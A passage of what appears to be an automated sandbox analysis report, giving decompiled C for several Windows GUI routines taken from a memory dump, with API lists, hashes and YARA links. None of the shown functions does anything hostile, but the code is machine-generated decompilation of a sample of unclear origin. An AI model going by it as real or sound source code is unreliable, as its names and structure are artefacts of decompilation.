				int _v8;
				int _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				signed int _t54;
				intOrPtr _t59;
				int _t61;
				void* _t63;
				void* _t66;
				void* _t82;
				int _t98;
				struct HDC__* _t99;

				_t99 = __edx;
				_t82 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
				_v16 = SaveDC(__edx);
				E004344B0(__edx, _a4, __ecx);
				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
				_t98 = 0;
				_v12 = 0;
				if((GetWindowLongA(E0043C1F4(_t82), 0xffffffec) & 0x00000002) == 0) {
					_t54 = GetWindowLongA(E0043C1F4(_t82), 0xfffffff0);
					__eflags = _t54 & 0x00800000;
					if((_t54 & 0x00800000) != 0) {
						_v12 = 3;
						_t98 = 0xa00f;
					}
				} else {
					_v12 = 0xa;
					_t98 = 0x200f;
				}
				if(_t98 != 0) {
					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
					DrawEdge(_t99,  &_v36, _v12, _t98);
					E004344B0(_t99, _v36.top, _v36.left);
					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
				}
				E00436D28(_t82, _t99, 0x14, 0);
				E00436D28(_t82, _t99, 0xf, 0);
				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
				if(_t59 == 0) {
					L12:
					_t61 = RestoreDC(_t99, _v16);
					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
					return _t61;
				} else {
					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
					if(_t63 < 0) {
						goto L12;
					}
					_v20 = _t63 + 1;
					_v8 = 0;
					do {
						_t66 = E004141BC( *((intOrPtr*)(_t82 + 0x19c)), _v8);
						_t107 =  *((char*)(_t66 + 0x57));
						if( *((char*)(_t66 + 0x57)) != 0) {
							E0043A2D0(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
						}
						_v8 = _v8 + 1;
						_t36 =  &_v20;
						 *_t36 = _v20 - 1;
					} while ( *_t36 != 0);
					goto L12;
				}
			}

APIs

SaveDC.GDI32 ref: 0043A2E6

Part of subcall function 004344B0: GetWindowOrgEx.GDI32(?), ref: 004344BE
Part of subcall function 004344B0: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 004344D4

IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043A307
GetWindowLongA.USER32 ref: 0043A31D
GetWindowLongA.USER32 ref: 0043A33F
SetRect.USER32 ref: 0043A36B
DrawEdge.USER32(?,?,?,00000000), ref: 0043A37A
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043A39F
RestoreDC.GDI32(?,?), ref: 0043A410

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
String ID:
API String ID: 2976466617-0
Opcode ID: d0140c666f526f50ef5f8ab22513bbbefff9821a20b66eb539e7ba88df28bdfb
Instruction ID: b0e91f104902065cc9bfcf8ecfdf17777c6db61d89a12b26c50b8d396225d46e
Opcode Fuzzy Hash: d0140c666f526f50ef5f8ab22513bbbefff9821a20b66eb539e7ba88df28bdfb
Instruction Fuzzy Hash: 0B416371B041156BDB00DB99CC85F9FB7B8AF48304F10516AF905EB396DA7CDD018799

Uniqueness

Uniqueness Score: -1.00%

Function 0045CC10, Relevance: 12.1, APIs: 8, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045CC10(void* __eax, void* __edx, void* __edi, void* __esi) {
				char _v12;
				int _v24;
				int _v28;
				signed int _v48;
				signed int _v52;
				int _t53;
				int _t55;
				signed int _t60;
				signed int _t63;
				int _t82;
				int _t84;
				signed int _t89;
				signed int _t92;
				void* _t97;
				void* _t113;

				_t97 = __eax;
				if(__edx == 0) {
					E00412B58(0, _t113, 0, __edi, __esi);
					E00412B58(1,  &_v12, 1, __edi, __esi);
					SetMapMode(E00420704( *((intOrPtr*)(_t97 + 0x208))), 8);
					SetWindowOrgEx(E00420704( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
					_t53 = E004355BC(_t97);
					_t55 = E00435578(_t97);
					SetViewportExtEx(E00420704( *((intOrPtr*)(_t97 + 0x208))), _t55, _t53, 0);
					_t60 = E004355BC(_t97);
					_t63 = E00435578(_t97);
					return SetWindowExtEx(E00420704( *((intOrPtr*)(_t97 + 0x208))), _t63 * _v52, _t60 * _v48, 0);
				}
				E00412B58(E00412B58(E00435578(__eax), _t113, 0, __edi, __esi) | 0xffffffff,  &_v12, 1, __edi, __esi);
				SetMapMode(E00420704( *((intOrPtr*)(_t97 + 0x208))), 8);
				SetWindowOrgEx(E00420704( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
				_t82 = E004355BC(_t97);
				_t84 = E00435578(_t97);
				SetViewportExtEx(E00420704( *((intOrPtr*)(_t97 + 0x208))), _t84, _t82, 0);
				_t89 = E004355BC(_t97);
				_t92 = E00435578(_t97);
				return SetWindowExtEx(E00420704( *((intOrPtr*)(_t97 + 0x208))), _t92 * _v52, _t89 * _v48, 0);
			}

APIs

SetMapMode.GDI32(00000000,00000008), ref: 0045CC4D
SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CC6A
SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CC8D
SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CCB8
SetMapMode.GDI32(00000000,00000008), ref: 0045CCEE
SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 0045CD0B
SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CD2E
SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CD59

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ModeViewport
String ID:
API String ID: 3149394475-0
Opcode ID: 0ff7e3d1fa3f50bea65dacad6271d8db0617f1f3ffc2ebfa0db5a1b2333ce918
Instruction ID: a4bd5625d253891b6eb85d08422eaf7e19539b069885d5f5ed27a20a838ea9be
Opcode Fuzzy Hash: 0ff7e3d1fa3f50bea65dacad6271d8db0617f1f3ffc2ebfa0db5a1b2333ce918
Instruction Fuzzy Hash: 46312F607043016BD740FF7A8C86B4B269D6B48318F04593EB999DB297CA7DE8454729

Uniqueness

Uniqueness Score: -1.00%

Function 0042103C, Relevance: 12.1, APIs: 8, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0042103C(void* __ebx) {
				struct HDC__* _v8;
				struct tagPALETTEENTRY _v1000;
				struct tagPALETTEENTRY _v1004;
				struct tagPALETTEENTRY _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				int _t53;
				intOrPtr _t60;
				void* _t62;
				void* _t63;

				_t62 = _t63;
				_v1036 = 0x300;
				_v1034 = 0x10;
				E004029BC(_t24, 0x40,  &_v1032);
				_v8 = GetDC(0);
				_push(_t62);
				_push(0x421139);
				_push( *[fs:eax]);
				 *[fs:eax] = _t63 + 0xfffffbf8;
				_t53 = GetDeviceCaps(_v8, 0x68);
				if(_t53 >= 0x10) {
					GetSystemPaletteEntries(_v8, 0, 8,  &_v1032);
					if(_v1004 != 0xc0c0c0) {
						GetSystemPaletteEntries(_v8, _t53 - 8, 8, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x424);
					} else {
						GetSystemPaletteEntries(_v8, _t53 - 8, 1,  &_v1004);
						GetSystemPaletteEntries(_v8, _t53 - 7, 7, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						GetSystemPaletteEntries(_v8, 7, 1,  &_v1000);
					}
				}
				_pop(_t60);
				 *[fs:eax] = _t60;
				_push(E00421140);
				return ReleaseDC(0, _v8);
			}

0x0042103d
0x00421046
0x0042104f
0x00421063
0x0042106f
0x00421074
0x00421075
0x0042107a
0x0042107d
0x0042108b
0x00421090
0x004210a5
0x004210b4
0x0042111b
0x004210b6
0x004210c9
0x004210e7
0x004210fb
0x004210fb
0x004210b4
0x00421122
0x00421125
0x00421128
0x00421138

APIs

GetDC.USER32(00000000), ref: 0042106A
GetDeviceCaps.GDI32(?,00000068), ref: 00421086
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 004210A5
GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 004210C9
GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 004210E7
GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 004210FB
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0042111B
ReleaseDC.USER32 ref: 00421133

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: EntriesPaletteSystem$CapsDeviceRelease
String ID:
API String ID: 1781840570-0
Opcode ID: 175b897e90c79142bf7d27bf80eb641bdcfa3a0205f4e550698412d9e580dc0c
Instruction ID: 1128953b8e5d6598885ed245dd4ee5d93dfe716b90322840084aa05605c4788b
Opcode Fuzzy Hash: 175b897e90c79142bf7d27bf80eb641bdcfa3a0205f4e550698412d9e580dc0c
Instruction Fuzzy Hash: AB2188F1A00218AADB10DB95CD81FAE77BCDB18704F5104A6F708F71C1D6796F548728

Uniqueness

Uniqueness Score: -1.00%

Function 0042162C, Relevance: 10.7, APIs: 7, Instructions: 166
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0042162C() {
				struct HINSTANCE__* _t145;
				long _t166;
				intOrPtr _t167;
				intOrPtr _t186;
				void* _t192;
				BYTE* _t193;
				BYTE* _t196;
				intOrPtr _t197;
				void* _t198;
				intOrPtr _t199;

				 *((intOrPtr*)(_t198 - 0x24)) = 0;
				 *((intOrPtr*)(_t198 - 0x20)) = E004214A0( *( *((intOrPtr*)(_t198 - 0x10)) + 2) & 0x0000ffff);
				_t192 =  *((intOrPtr*)(_t198 - 0xc)) - 1;
				if(_t192 > 0) {
					_t197 = 1;
					do {
						_t167 = E004214A0( *( *((intOrPtr*)(_t198 - 0x10)) + 2 + (_t197 + _t197) * 8) & 0x0000ffff);
						if(_t167 <=  *((intOrPtr*)(_t198 - 0x1c)) && _t167 >=  *((intOrPtr*)(_t198 - 0x20)) && E004214AC( *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8,  *((intOrPtr*)(_t198 - 0x10)) + (_t197 + _t197) * 8, _t198) != 0) {
							 *((intOrPtr*)(_t198 - 0x24)) = _t197;
							 *((intOrPtr*)(_t198 - 0x20)) = _t167;
						}
						_t197 = _t197 + 1;
						_t192 = _t192 - 1;
						_t204 = _t192;
					} while (_t192 != 0);
				}
				 *(_t198 - 0x40) =  *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8;
				 *( *(_t198 + 8)) =  *( *(_t198 - 0x40)) & 0x000000ff;
				( *(_t198 + 8))[1] = ( *(_t198 - 0x40))[1] & 0x000000ff;
				 *((intOrPtr*)(_t198 - 0x2c)) = E004083C4(( *(_t198 - 0x40))[8], _t204);
				 *[fs:eax] = _t199;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0x10))( *[fs:eax], 0x421813, _t198);
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 8))();
				E004212E4( *((intOrPtr*)(_t198 - 0x2c)),  *((intOrPtr*)(_t198 - 0x2c)), _t198 - 0x38, _t198 - 0x34, _t192,  *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))), _t204,  *(_t198 + 8));
				GetObjectA( *(_t198 - 0x38), 0x18, _t198 - 0x70);
				GetObjectA( *(_t198 - 0x34), 0x18, _t198 - 0x58);
				_t166 =  *(_t198 - 0x64) *  *(_t198 - 0x68) * ( *(_t198 - 0x60) & 0x0000ffff);
				 *(_t198 - 0x3c) =  *(_t198 - 0x4c) *  *(_t198 - 0x50) * ( *(_t198 - 0x48) & 0x0000ffff);
				 *((intOrPtr*)(_t198 - 0x18)) =  *(_t198 - 0x3c) + _t166;
				 *(_t198 - 0x30) = E004083C4( *((intOrPtr*)(_t198 - 0x18)), _t204);
				_push(_t198);
				_push(0x4217f0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t199;
				_t193 =  *(_t198 - 0x30);
				_t196 =  &(( *(_t198 - 0x30))[_t166]);
				GetBitmapBits( *(_t198 - 0x38), _t166, _t193);
				GetBitmapBits( *(_t198 - 0x34),  *(_t198 - 0x3c), _t196);
				DeleteObject( *(_t198 - 0x34));
				DeleteObject( *(_t198 - 0x38));
				_t145 =  *0x492714; // 0x400000
				 *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) = CreateIcon(_t145,  *( *(_t198 + 8)), ( *(_t198 + 8))[1],  *(_t198 - 0x48),  *(_t198 - 0x46), _t193, _t196);
				if( *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) == 0) {
					E00420A54(_t166);
				}
				_pop(_t186);
				 *[fs:eax] = _t186;
				_push(E004217F7);
				return E00402774( *(_t198 - 0x30));
			}

APIs

GetObjectA.GDI32(?,00000018,?), ref: 0042171E
GetObjectA.GDI32(?,00000018,?), ref: 0042172D
GetBitmapBits.GDI32(?,?,?), ref: 0042177E
GetBitmapBits.GDI32(?,?,?), ref: 0042178C
DeleteObject.GDI32(?), ref: 00421795
DeleteObject.GDI32(?), ref: 0042179E
CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 004217C0

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$BitmapBitsDelete$CreateIcon
String ID:
API String ID: 1030595962-0
Opcode ID: b6496f7ab096e94c06732ecd227add21863255d75ea2945ba1247e13822358e2
Instruction ID: 0d7ec777cfb284482c5f7389cf99185666adb597eb2ac4453440195fbf546e72
Opcode Fuzzy Hash: b6496f7ab096e94c06732ecd227add21863255d75ea2945ba1247e13822358e2
Instruction Fuzzy Hash: 46612671A00228AFCB00DFA9D881EAEBBF9FF58304B554466F804EB361D734AD51CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00471500, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 163
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00471500(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v28;
				void* _v32;
				struct tagPOINT _v40;
				void* _t55;
				void* _t56;
				signed char _t60;
				struct HWND__* _t61;
				void* _t64;
				void* _t66;
				struct HWND__* _t73;
				signed short _t80;
				void* _t89;
				int _t93;
				long _t106;
				intOrPtr* _t112;
				intOrPtr _t123;
				intOrPtr _t124;
				void* _t132;
				signed char* _t141;
				void* _t144;
				void* _t145;
				struct HWND__* _t148;
				void* _t152;

				_v16 = 0;
				_t144 = __edx;
				_t112 = __eax;
				_push(_t152);
				_push(0x4716ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t152 + 0xffffffdc;
				E0043A5A4(__eax, 0, __edx, __eflags);
				if(E00471730(_t112) == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t144 + 8)))) !=  *((intOrPtr*)(_t112 + 0x264))) {
					L22:
					_pop(_t123);
					 *[fs:eax] = _t123;
					_push(0x471706);
					return E00404348( &_v16);
				} else {
					_t124 =  *((intOrPtr*)(_t144 + 8));
					_t55 =  *((intOrPtr*)(_t124 + 8)) - 0xfffffec9;
					if(_t55 == 0) {
						 *((char*)(_t112 + 0x295)) = 1;
						goto L22;
					}
					_t56 = _t55 - 4;
					if(_t56 == 0) {
						_t57 = _t124;
						_t141 =  *(_t124 + 0x14);
						__eflags =  *_t141 & 0x00000001;
						if(( *_t141 & 0x00000001) != 0) {
							_t145 = E00473F50(_t112,  *((intOrPtr*)(_t57 + 0xc)));
							_t60 =  *(_t145 + 0x18);
							__eflags = _t60 - _t141[4];
							if(_t60 < _t141[4]) {
								_t61 =  *(_t145 + 0x14);
								__eflags = _t61;
								if(_t61 > 0) {
									__eflags = _t61 - _t141[4];
									if(_t61 <= _t141[4]) {
										_t141[4] = _t61;
									}
								}
							} else {
								_t141[4] = _t60;
							}
							E0046EC6C(_t145, _t141[4]);
						}
					} else {
						_t64 = _t56 - 2;
						if(_t64 == 0) {
							_t66 = E00473F50(_t112,  *((intOrPtr*)(_t124 + 0xc)));
							E0046EC6C(_t66, E00426C9C(E0043C1F4(_t112),  *((intOrPtr*)(_t124 + 0xc))));
							_t73 =  *((intOrPtr*)( *_t112 + 0x120))();
							__eflags = _t73;
							if(_t73 != 0) {
								 *((intOrPtr*)( *_t112 + 0x7c))();
							}
						} else {
							if(_t64 == 0x12c) {
								_push(E00407280(GetMessagePos()) & 0x0000ffff);
								_t80 = GetMessagePos();
								_pop(_t132);
								E004067C4(_t80 & 0x0000ffff,  &_v12, _t132);
								E004356B8(_t112,  &_v40,  &_v12);
								_push(_v40.y);
								_t148 = ChildWindowFromPoint(E0043C1F4(_t112), _v40.x);
								__eflags = _t148;
								if(_t148 != 0) {
									_t89 = E0043C1F4(_t112);
									__eflags = _t148 - _t89;
									if(_t148 != _t89) {
										E00404984( &_v16, 0x50);
										_t93 = E00404600(_v16);
										E00404984( &_v16, GetClassNameA(_t148, E004047F8(_v16), _t93));
										E00404744(_v16, "SysHeader32");
										if(__eflags == 0) {
											E004356B8(_t112,  &_v40,  &_v12);
											_v32 = _v40;
											_v28 = _v40.y;
											_t106 = SendMessageA(_t148, 0x1206, 1,  &_v32);
											__eflags = _t106;
											if(_t106 >= 0) {
												E00473F50(_t112, _v20);
												E004037D8(_t112, __eflags);
											}
										}
									}
								}
							}
						}
					}
					goto L22;
				}
			}

APIs

GetMessagePos.USER32 ref: 0047160B
GetMessagePos.USER32 ref: 00471619
ChildWindowFromPoint.USER32 ref: 00471645
GetClassNameA.USER32(00000000,00000000,00000000), ref: 00471683
SendMessageA.USER32(00000000,00001206,00000001,?), ref: 004716C6

Strings

SysHeader32, xrefs: 00471695

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$ChildClassFromNamePointSendWindow
String ID: SysHeader32
API String ID: 2510305242-2725536604
Opcode ID: c7d7b0a6ac5f74f308e2cd32c517e2bafc58c2ed1e88b2bff94cc20dd94be76f
Instruction ID: 6b2bad6963ab82c7d2df9250cbb17f493e62e620510ab16994f09dbd37808084
Opcode Fuzzy Hash: c7d7b0a6ac5f74f308e2cd32c517e2bafc58c2ed1e88b2bff94cc20dd94be76f
Instruction Fuzzy Hash: E4513270B005059BCB14EFBEC8829DEB7E5AF48304B14867BF819E7362D638ED058A59

Uniqueness

Uniqueness Score: -1.00%

Function 0043D5B4, Relevance: 10.7, APIs: 7, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0043D5B4(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _t85;
				void* _t113;
				intOrPtr _t129;
				intOrPtr _t138;
				void* _t141;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t113 = __ecx;
				_v8 = __eax;
				_t138 =  *0x491278; // 0x492c08
				 *((char*)(_v8 + 0x210)) = 1;
				_push(_t141);
				_push(0x43d77b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141 + 0xffffffe0;
				E00435BA4(_v8, __ecx, __ecx, _t138);
				_v16 = _v16 + 4;
				E00436DCC(_v8,  &_v28);
				if(E004531A0() <  *(_v8 + 0x4c) + _v24) {
					_v24 = E004531A0() -  *(_v8 + 0x4c);
				}
				if(E004531AC() <  *(_v8 + 0x48) + _v28) {
					_v28 = E004531AC() -  *(_v8 + 0x48);
				}
				if(E00453194() > _v28) {
					_v28 = E00453194();
				}
				if(E00453188() > _v16) {
					_v16 = E00453188();
				}
				SetWindowPos(E0043C1F4(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E00404600(_t113) < 0x64 &&  *0x4768fc != 0) {
					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							E00440808( &_v36);
							if(_v32 <= _v24) {
							}
						}
						 *0x4768fc(E0043C1F4(_v8), 0x64,  *0x00476A04 | 0x00040000);
					}
				}
				ShowWindow(E0043C1F4(_v8), 4);
				 *((intOrPtr*)( *_v8 + 0x7c))();
				_pop(_t129);
				 *[fs:eax] = _t129;
				_push(0x43d782);
				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
				_t85 = _v8;
				 *((char*)(_t85 + 0x210)) = 0;
				return _t85;
			}

APIs

SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,0043D77B), ref: 0043D699
GetTickCount.KERNEL32 ref: 0043D69E
SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 0043D6D9
SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0043D6F1
AnimateWindow.USER32(00000000,00000064,00000001), ref: 0043D737
ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,0043D77B), ref: 0043D748
GetTickCount.KERNEL32 ref: 0043D762

Part of subcall function 00440808: GetCursorPos.USER32(?), ref: 0044080C

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
String ID:
API String ID: 3024527889-0
Opcode ID: c0251c773faf6aeb38ae199890a681a40f9054977bbdfca893ddb65535208a80
Instruction ID: 6018d5a9782b2466c3a615f03d0ee70380d541917bdbd0c30e30099fca95ef71
Opcode Fuzzy Hash: c0251c773faf6aeb38ae199890a681a40f9054977bbdfca893ddb65535208a80
Instruction Fuzzy Hash: AD516170A00109EFDB00EFA9C986E9EB3F5EF49304F2045AAF514E7251D779AE40DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0046E234, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 146
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0046E234(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t46;
				int _t56;
				void* _t68;
				void* _t71;
				void* _t85;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t97;
				intOrPtr _t102;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_v28 = 0;
				_t110 = __edx;
				_t85 = __eax;
				_push(_t113);
				_push(0x46e412);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xffffffe8;
				if(__edx == 0) {
					L8:
					if( *((intOrPtr*)(_t85 + 0x20c)) == 0) {
						L12:
						if(_t110 != 0 &&  *((intOrPtr*)(_t110 + 0x30)) ==  *((intOrPtr*)(_t85 + 0x30))) {
							_t92 =  *0x467bd8; // 0x467c24
							if(E00403768(_t110, _t92) == 0) {
								_t93 =  *0x4677c0; // 0x46780c
								if(E00403768(_t110, _t93) == 0) {
									_t94 =  *0x4688d0; // 0x46891c
									if(E00403768(_t110, _t94) == 0 && E0046E204(E00403524(_t110), "TDBEdit") == 0 && E0046E204(E00403524(_t110), "TDBMemo") == 0) {
										_t46 = E0043C4F8(_t85);
										_t132 = _t46;
										if(_t46 != 0) {
											E0046E440(_t85, _t110, _t132);
											_t56 = E0043C1F4(_t110);
											SendMessageA(E0043C1F4(_t85), 0x469, _t56, 0);
										}
										 *((intOrPtr*)(_t85 + 0x20c)) = _t110;
										_t97 =  *0x428db4; // 0x428e00
										if(E00403768(_t110, _t97) != 0) {
											E004086FC( *((short*)(_t85 + 0x21c)),  &_v28);
											E00435BA4(_t110, _t85, _v28, _t110);
										}
									}
								}
							}
						}
						_pop(_t91);
						 *[fs:eax] = _t91;
						_push(0x46e419);
						return E00404348( &_v28);
					}
					if(E0043C4F8(_t85) != 0) {
						SendMessageA(E0043C1F4(_t85), 0x469, 0, 0);
					}
					 *((intOrPtr*)(_t85 + 0x20c)) = 0;
					goto L12;
				}
				_t68 = E0043907C( *((intOrPtr*)(__eax + 0x30))) - 1;
				if(_t68 >= 0) {
					_v8 = _t68 + 1;
					_t108 = 0;
					do {
						_t71 = E00439040( *((intOrPtr*)(_t85 + 0x30)), _t108);
						_t102 =  *0x467bd8; // 0x467c24
						if(E00403768(_t71, _t102) != 0 && _t85 != E00439040( *((intOrPtr*)(_t85 + 0x30)), _t108) && _t110 ==  *((intOrPtr*)(E00439040( *((intOrPtr*)(_t85 + 0x30)), _t108) + 0x20c))) {
							_v24 =  *((intOrPtr*)(_t110 + 8));
							_v20 = 0xb;
							_v16 =  *((intOrPtr*)(E00439040( *((intOrPtr*)(_t85 + 0x30)), _t108) + 8));
							_v12 = 0xb;
							_t89 =  *0x491254; // 0x465870
							E0040A250(_t85, _t89, 1, _t108, _t110, 1,  &_v24);
							E00403DA8();
						}
						_t108 = _t108 + 1;
						_t16 =  &_v8;
						 *_t16 = _v8 - 1;
					} while ( *_t16 != 0);
				}
			}

APIs

SendMessageA.USER32(00000000,00000469,00000000,00000000), ref: 0046E312
SendMessageA.USER32(00000000,00000469,00000000,00000000), ref: 0046E3C7

Strings

TDBMemo, xrefs: 0046E38E
pXF, xrefs: 0046E2D0
TDBEdit, xrefs: 0046E379
$|F, xrefs: 0046E27D, 0046E335

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

